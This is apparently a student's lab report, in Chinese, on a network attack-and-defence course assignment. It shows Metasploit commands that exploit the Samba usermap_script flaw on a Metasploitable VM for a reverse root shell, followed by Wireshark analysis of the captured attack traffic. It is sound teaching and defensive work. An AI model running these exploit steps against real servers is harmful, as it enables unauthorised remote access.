20211909 2021-2022-2 《网络攻防实践》第七次作业

实践内容

(1)使用Metasploit进行Linux远程渗透攻击

任务:使用Metasploit渗透测试软件,攻击Linux靶机上的Samba服务Usermap_script安全漏洞,获取目标Linux靶机的主机访问权限。实践步骤如下:

①启动Metasploit软件,可根据个人喜好使用msfconsole、msfgui、msfweb之一;

②使用exploit:exploit/multi/samba/usermap_script渗透攻击模块;

③选择攻击PAYLOAD为远程shell,(正向或反向连接均可);

④设置渗透攻击参数(RHOST,LHOST,TARGET等);

⑤执行渗透攻击;

⑥查看是否正确得到远程Shell,并查看获得的权限。

(2)实践作业:攻防对抗实践

攻击方:使用 Metasploit ,选择 Metasploitable 靶机中发现的漏洞进行渗透攻击,获得远程控制权,并尝试进一步获得root权限。

防守方:使用 tcpdump/wireshark/snort 监听获得网络攻击的数据包文件,结合 wireshark/snort 分析攻击过程,获得攻击者的IP、目标IP和端口、攻击发起时间、攻击利用漏洞、使用Shellcode、以及成功之后在命令行输入的信息。

实践过程

使用Metasploit进行Linux远程渗透攻击

攻击机kali:192.168.235.128
靶机metasploitable:192.168.235.131

查找漏洞并使用相关的攻击脚本

search usermap_script
use 0

选择使用的payload

show payloads
set payload cmd/unix/reverse

设置对应的参数,并发起攻击

show options
set RHOSTS 192.168.235.131
expliot

可以看到我们已经成功获取了靶机的root权限

whoami

实践作业:攻防对抗实践

对任务1中的攻击进行抓包,并以攻击机和靶机的ip为条件进行筛选

ip.addr == 192.168.235.131 && ip.addr == 192.168.235.128

可以看到攻击者攻击的是139端口,139端口是Samba服务,所以攻击者是利用了Samba服务的漏洞进行攻击。

在SMB包中找到了命令注入的信息,这写的是bash脚本,大致功能就是通过Samba服务的usermap_script远程命令注入漏洞注入该代码,代码中利用telnet的方式让攻击者获取了靶机的权限,也就是说这段bash脚本实际上是一段shellcode。

心得体会

这次实验让我掌握了分析攻击流量的基本方法。

posted @ 2022-05-01 09:57  PwnKi  阅读(128)  评论(0编辑  收藏  举报